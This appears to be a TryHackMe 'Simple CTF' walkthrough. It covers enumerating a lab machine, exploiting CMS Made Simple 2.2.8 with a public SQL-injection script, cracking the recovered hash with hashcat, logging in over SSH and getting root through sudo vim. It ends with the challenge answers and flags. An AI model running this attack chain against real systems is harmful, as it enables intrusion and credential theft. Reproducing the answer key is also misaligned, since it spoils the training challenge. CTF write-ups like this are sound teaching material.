SimpleCTF TryHackMe

performed by: jb-williams

Simple CTF

Deploy the machine and attempt the questions!

Initial Scan

  • First we run nmap on the target IP.
  • The first scan didn’t give me any info and even suggested adding -Pn to the command:
nmap -v -T4 -sV -sC -Pn -oA nmap/initial 10.10.237.242
  • This output will provide the answers for the first two questions.
  • In the nmap output I noticed that the ftp service on port 21 allowed anonymous login.

  • Login to FTP
ftp -p 10.10.237.242
  • And login as user anonymous
  • Then run passive to see if the output is:
Passive mode: off; fallback to active mode: off.
  • Then running the command ls will show a directory called pub.
  • Change into that directory with cd pub and run ls again.
  • You will see a file called ForMitch.txt.
  • To download all files in the directory including ForMitch.txt run the command mget *, and you can exit back out to your terminal.
  • Viewing the contents of ForMitch.txt with cat, you see that the user Mitch has a very simple password that is easy to crack.

  • I ran feroxbuster on the target machine while if was going over the nmap output and ftp process.
feroxbuster -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o ferox-initial.txt -t 15 -L 15 -s 200,302,304 -P http://localhost:8080 -e -u http://10.10.237.242/
  • The main finds were paths /simple/ and /simple/admin/.
  • Traveling to the /simple/ directory we see that the site is using a content management system CMS Made Simple.
  • Scanning that page you can see on the bottom left that the version is 2.2.8

  • Using searchsploit we can see if there are any known exploits for this version.
searchsploit cms made simple 2.2.8
  • The output shows that there is a known exploit CMS Made Simple < 2.2.10 - SQL Injection with the exploit path of php/webapps/46635.py.
  • To get the full path and to look at the exploit run:
searchsploit -x 46635.py
  • Noticed that it can be ran with -u for url -w for path/to wordlist and --crack to crack the password. So exited the pager.
  • After leaving the pager it will show the full path to that exploit.
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
  • I copied that exploit to my working directory and ran it:
python3 46635.py -u http://10.10.237.242/simple --crack -w ~/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
  • Got an error and opened it up in a text editor.
  • I noticed that the script started with #!/usr/bin/env python I changed it to #!/usr/bin/env python3.
  • I also noticed that all the print statements were in python2 syntax not python3. And need to change any of the print "<Stuff>" to print ("<Stuff>").
  • To do this quickly all at once I closed the text editor and ran this command on 46635.py.

note: this didn’t fully work… one edit needed to be made..shown below

sed -i 's#"."#(&)#g' 46635.py
  • Thought I was being clever but it actually double parentheses a print statement for me on line 183, so I changed that line from:
print colored(("<Stuffs>"))

to

print (colored("<Stuffs>"))
  • With that done I re-ran:
python3 46635.py -u http://10.10.237.242/simple --crack -w ~/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
  • The --crack option didn’t work but I did get output: salt for a password, a username, an email, and a hashed password.
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96
  • If you run the password hash through hash-identifier, it shows that the hash is likely MD5:
hash-identifier 0c01f4468bd75d7a84c7eb73846e8d96
  • We can use hashcat to crack this, put it in passwordhash:salt format.
hashcat -O -a 0 -m 10 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt --show
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
  • The -O is to enalbe optimized kernel
  • The -a 0 is the attack mode for MD5
  • The -m 10 is for the setup of the hash and salt passwordhash:salt
  • After the hash and salt the last bit is the path/to the rockyou.txt wordlist.

  • Finding the password for mitch, we attempt to login through ssh port 2222
ssh mitch@10.10.237.242 -p 2222
  • After logging in run ls you see user.txt
cat user.txt
  • Also, running ls /home lets you see if there are any other users’ home folders.

  • After getting the user.txt flag I ran sudo -l to see if there was anyting I could run as sudo with this user, and you can see that they are allowed to use vim without a password.
  • Navigating to GTFOBins and search for vim, and you can see a couple commands for breaking out of restricted envirnments. I tried option (a).
sudo vim -c ':!/bin/bash'
  • Running whoami you can see you are now root.
  • Run a quick ls /root and see root.txt.
cat /root/root.txt

Answers

How many services are running under port 1000?

  • Answer: 2

What is running on the hight port?

  • Answer: ssh

What’s the CVE you-re using against the application?

  • Answer: CVE-2019-9053 (found in the comments of the exploit code)

To what kind of vulnerability is the application vulnerable?

  • Answer: sqli

What’s the password?

  • Answer: secret

Where can you login with the details obtained?

  • Answer: ssh

Whats the user flag?

  • Answer: G00d j0b, keep up!

Is there any other user in the home directory? What’s its name?

  • Answer: sunbath

What can you leverage to spawn a privileged shell?

  • Answer: vim

What’s the root flag?

  • Answer: W3ll d0n3. You made it!

written and performed by jb-williams - github